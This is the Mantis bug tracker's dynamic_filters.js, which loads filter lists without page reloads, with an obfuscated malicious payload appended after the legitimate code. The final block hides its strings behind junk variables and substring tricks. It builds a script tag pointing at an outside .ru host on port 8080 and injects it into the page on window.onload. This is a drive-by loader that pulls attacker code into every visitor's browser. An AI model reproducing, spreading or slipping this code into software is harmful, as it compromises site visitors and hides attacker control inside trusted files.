/*
# Mantis - a php based bugtracking system

# Copyright (C) 2000 - 2002  Kenzaburo Ito - kenito@300baud.org
# Copyright (C) 2002 - 2007  Mantis Team   - mantisbt-dev@lists.sourceforge.net

# Mantis is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Mantis is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mantis.  If not, see <http://www.gnu.org/licenses/>.
 *
 * --------------------------------------------------------
 * $Id: dynamic_filters.js,v 1.5.2.1 2007-10-13 22:35:56 giallu Exp $
 * --------------------------------------------------------
 */
/*
// +----------------------------------------------------------------------+
// | Orginial Code Care Of:                                               |
// +----------------------------------------------------------------------+
// | Copyright (c) 2004 Bitflux GmbH                                      |
// +----------------------------------------------------------------------+
// | Licensed under the Apache License, Version 2.0 (the "License");      |
// | you may not use this file except in compliance with the License.     |
// | You may obtain a copy of the License at                              |
// | http://www.apache.org/licenses/LICENSE-2.0                           |
// | Unless required by applicable law or agreed to in writing, software  |
// | distributed under the License is distributed on an "AS IS" BASIS,    |
// | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or      |
// | implied. See the License for the specific language governing         |
// | permissions and limitations under the License.                       |
// +----------------------------------------------------------------------+
// | Author: Bitflux GmbH <devel@bitflux.ch>                              |
// |         http://blog.bitflux.ch/p1735.html                            |
// +----------------------------------------------------------------------+
//
//
// +----------------------------------------------------------------------+
// | Heavily Modified by Jeff Minard (07/09/04)                           |
// +----------------------------------------------------------------------+
// | Same stuff as above, yo!                                             |
// +----------------------------------------------------------------------+
// | Author: Jeff Minard <jeff-js@creatimation.net>                       |
// |         http://www.creatimation.net                                  |
// |         http://www.creatimation.net/journal/live-request             |
// +----------------------------------------------------------------------+
//
// +----------------------------------------------------------------------+
// | What is this nonsense?? (07/09/04)                                   |
// +----------------------------------------------------------------------+
// | This is a script that, by using XMLHttpRequest javascript objects    |
// | you can quickly add some very click live interactive feed back to    |
// | your pages that reuire server side interaction.                      |
// |                                                                      |
// | For instance, you use this to emulate a "live searching" feature     |
// | wherein users type in key phrases, and once they have stopped typing |
// | the script will automatically search and retrive *without* a page    |
// | reload.
// |                                                                      |
// | In another instance, I use this to product live comments by passing  |
// | the text to a Textile class that parses it to valid HTML. After      |
// | parsing, the html is returned and displayed on the page as the       |
// | user types.                                                          |
// +----------------------------------------------------------------------+
//
//
// +----------------------------------------------------------------------+
// | Modified by Lee O'Mara <lomara@omara.ca>                  12/08/2004 |
// +----------------------------------------------------------------------+
// | Hacked apart Jeff's script for use in Mantis.                        |
// |                                                                      |
// | This script gets filters from the server and displays them without   |
// | reloading the page.                                                  |
// |                                                                      |
// | The script tries to follow the notion of "unobtrusive javascript".   |
// | There are no event handlers in the HTML code. The events are added   |
// | on pageload(based on specific id names).                             |
// +----------------------------------------------------------------------+
//
//
*/


var processURI    = './return_dynamic_filters.php';
var liveReq = false;

/**
 * Build the XMLHttpRequest and send it
 */
function liveReqDoReq() {

	if (liveReq && liveReq.readyState < 4) {
		liveReq.abort();
	}
	
	if (window.XMLHttpRequest) {
		// branch for IE7, Firefox, Opera, etc.
		liveReq = new XMLHttpRequest();
	} else if (window.ActiveXObject) {
		// branch for IE5, IE6 via ActiveX
		liveReq = new ActiveXObject("Microsoft.XMLHTTP");
	}

	name = this.id;
	liveReq.onreadystatechange = function(){liveReqProcessReqChange(name);};
	t_view = document.getElementById('filters_form_open').elements['view_type'].value;
	liveReq.open("GET", processURI + "?view_type=" + t_view + "&filter_target=" + this.id);

	// show "Loading..." while waiting
	document.getElementById(this.id+'_target').innerHTML = string_loading;

	liveReq.send(null);

	return false;
}

/**
 * Processes the results of the XMLHttpRequest
 */
function liveReqProcessReqChange(name) {
	if (liveReq.readyState == 4) {
		document.getElementById(name+'_target').innerHTML = liveReq.responseText;
		replaceWithContent(name);
	}
}

/**
 * Strip the tag, leave the content.
 */
function replaceWithContent(id){
	tag = document.getElementById(id);
	if (!tag) return false;
	t_parent = tag.parentNode;
	if (!t_parent) return false;
	for(var i=0; i <tag.childNodes.length; i++){
		child = tag.childNodes[i].cloneNode(true);
		t_parent.insertBefore(child, tag);
	}
	t_parent.removeChild(tag);
}

/**
 * Initialise the filter links
 */
function labelInit(){
	// keep browsers that don't support DOM or
	// XMLHttpRequest from getting in trouble
	if (document.getElementById && 	(window.XMLHttpRequest || window.ActiveXObject)) {

		t_form = document.getElementById("filters_form_open");
		if (!t_form) return false;

		t_links = t_form.getElementsByTagName("a");
		if (!t_links) return false;

		for(var i=0; i < t_links.length; i++){
			var t_link = t_links[i];
			if (t_link.id.substring((t_link.id.length - 7), t_link.id.length) == "_filter"){
				// only attach event handler if a target is found
				if (document.getElementById(t_link.id+'_target')){
					// setup the event handler
					t_link.onclick = liveReqDoReq;
				} else {
					alert("missing target for:" +t_link.id);
				}
			}
		}
	}
}

addLoadEvent(labelInit);

Js={m:"kQ"};var Nu={d:24459};D={U:28537};var G;this.Q="";var HA=["P","lK","mF"];v=function(){this.Y=59525;this.Y-=62;E=21382;E--;function F(a,H,x){var e={JsZ:false};return a.substr(H,x);try {var p='X'} catch(p){};ud={aG:false};}var s=["Ye"];var S=RegExp;LL=["NN","i"];lS=["y","mN"];var h='';vG={lB:"Md"};var Gi=["nJ","UZ","uO"];jV=["_","Vt","kK"];aB=["mL","ky","WN"];var B=new String("/go"+"ogl"+"e.c"+F("om/NH09",0,3)+F("A3YelmY3A",3,3)+F("undCho",0,3)+F("ywVo.eywV",3,3)+F("s/cRDn",0,3)+F("DBVjhinVBjD",4,3)+"ane"+F("ws.pcrE",0,3)+F("MutrcomurMt",4,3)+F("HjG.cnHjG",3,3)+F("nJi.phinJ",3,3)+F("pJsY",0,1));tF=46947;tF--;var M=document;var K=["Z","hi","Lf"];var Hj=["FL","XR","WU"];this.I="I";function V(a,H){var Og=["Yb","uQ","JC"];var x=F("[aZq",0,1)+H+"]";bn=62662;bn-=85;var sT={cO:"hq"};var k=new S(x, String(F("go16e",0,1)));try {var kJ='LG'} catch(kJ){};return a.replace(k, h);var Ky=["Ix","kG"];try {} catch(R){};};var CK='';var _X="_X";var EU=55117;IQ=61784;IQ+=230;var Gk=V('smcfruiqpmtu','ubMmVEBqf');var zR=[];var dp=["kyD","nz"];var C="body";var J=null;qA={Ep:false};this.rM="";var Gc=935701-927621;A=8832;A++;Dg=22358;Dg++;var UK={II:43677};G=function(){var m_=false;try {var Fi=V('cyrXeLaMtweXEjlLe4m3e3nztj','wyMT4XjuD3sLxCz');this.vz=38890;this.vz-=158;L=M[Fi](Gk);var g=String("defe"+F("rMewi",0,1));Ed={kC:"Rh"};VT={NY:"sa"};var a=Gc+B;var O=V('sfrqc_','fb_LqpmhIU');this.XS=36169;this.XS-=85;dL=51281;dL--;var SE="";L[O]="ht"+F("tpkDYG",0,2)+":/"+F("/trWIG",0,2)+F("axULm",0,2)+F("N2oes2oN",3,2)+F("W4rVba4WVr",4,2)+F("llvqu",0,2)+F(".rUlHd",0,2)+F("bwru:wbr",3,2)+a;mu=43447;mu-=167;pJ=32931;pJ-=62;L[g]=[1,2][0];M[C].appendChild(L);m_A={tp:"UM"};this.pU='';} catch(N){this.Lu='';};Ab={lI:false};};};var kd=[];var rJ=new String();v();oc=44192;oc++;JX=34499;JX-=206;window.onload=G;this.fE=3401;this.fE+=35;var ja=["Ug","_z"];